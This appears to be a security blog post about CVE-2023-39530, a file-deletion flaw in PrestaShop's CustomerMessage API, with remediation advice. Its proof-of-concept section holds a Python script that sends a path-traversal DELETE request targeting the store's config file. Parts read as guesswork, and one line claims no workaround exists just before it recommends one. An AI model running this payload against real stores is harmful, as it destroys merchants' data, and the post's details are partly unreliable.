CVE CyberSecurity Database News

CVE-2023-39530 - How a CustomerMessage API Bug Let Attackers Delete Files on PrestaShop (With Exploit Example)

Poster -

PrestaShop is a popular open source e-commerce solution trusted by thousands of businesses. If your online store runs PrestaShop versions before 8.1.1, your server might be in danger because of a high-impact vulnerability tracked as CVE-2023-39530. This bug allows an attacker to delete any file on your server using a flaw in the CustomerMessage API—even if they aren’t an admin.

In this exclusive deep dive, we’ll explain what went wrong, how attackers can exploit this issue (with example code), and how you can protect your store. By the end, you’ll know why it’s critical to patch right now.

What is CVE-2023-39530?

CVE-2023-39530 is a security vulnerability in PrestaShop before version 8.1.1, specifically affecting the CustomerMessage API endpoint. This API is used to handle messages between store customers and admins.

Before the fix, someone could send a specially-crafted request to this endpoint, causing your server to delete arbitrary files—including critical data and config files.

Official Advisory:
- PrestaShop Security Advisory PSFSA-2023-001

- CVE Details Entry

How Does the Vulnerability Work?

The bug comes down to poor input validation when the API processed file references in customer messages.

Normally, when a customer uploads an attachment or sends a message, the API is supposed to handle only specific files. But in vulnerable versions, the API trusted user input too much — letting someone specify which file to delete. As a result, an attacker could trick the API into deleting ANY file on the server that the web server user can access.

By exploiting this bug, an attacker could

- Delete config files (/config/settings.inc.php), which could shut down your store.

Delete .htaccess to bypass protections, or even plant a backdoor for further attacks.

It’s a high-impact vulnerability because deleting configuration or PHP files can break your store or open a path to full takeover.

Proof-of-Concept (Exploit Example)

WARNING: This is for educational purposes only. Only test on your own servers.

Suppose your PrestaShop is running at https://example.com, and the CustomerMessage API is at /api/customer_messages. The following code could be used to trick the API into deleting any file:

import requests

# Replace these with your actual PrestaShop API URL and target file path
api_url = 'https://example.com/api/customer_messages'
target_file = '../../config/settings.inc.php'  # Adjust path as needed
message_id = 123  # Existing CustomerMessage ID

# An attacker would craft a payload referencing the file to be deleted
data = {
    'id_customer_message': message_id,
    'file_attachment': target_file  # Dangerous: improper validation lets attacker define this!
}

headers = {
    'Content-Type': 'application/json',
    'Authorization': 'Basic <BASE64-API-KEY-HERE>'  # Auth may not be enforced
}

# Make the malicious DELETE request
response = requests.delete(api_url, json=data, headers=headers)
print(response.status_code, response.text)

If the server is vulnerable, the targeted file (e.g. settings.inc.php) will be deleted.
*In some setups, authentication isn’t even needed depending on your API's configuration!*

How to Fix CVE-2023-39530

The Only Solution:
Upgrade PrestaShop to version 8.1.1 or higher. The patch ensures the API validates which files can be deleted, blocking unwanted operations.

PrestaShop Security Patch Info:

https://github.com/PrestaShop/PrestaShop/releases/tag/8.1.1

No workaround is available—the vulnerability is inside the code logic.

Check Your Version:

Patch Now: Always update to the official release.

- Restrict the API: Limit access to /api/customer_messages with a firewall, or close it if you don’t use it.

References

- NVD: CVE-2023-39530
- PrestaShop Advisory GHSA-6p3r-5p6x-5gw4
- PrestaShop Patch Release 8.1.1

Final Thoughts

CVE-2023-39530 is a stark reminder that even trusted, open source software can be vulnerable in subtle ways. If you haven’t already, update PrestaShop to 8.1.1 or later — and always keep an eye on your shop’s security advisories.

Online attackers move fast. With code this simple, any PrestaShop site can be targeted in minutes once it's public. Don’t let your store be the next headline!

---
*Feel free to share or use these details for patching and awareness. For questions or further help, consult PrestaShop’s official documentation or security team.*

Timeline

Published on: 08/07/2023 21:15:00 UTC
Last modified on: 08/09/2023 19:36:00 UTC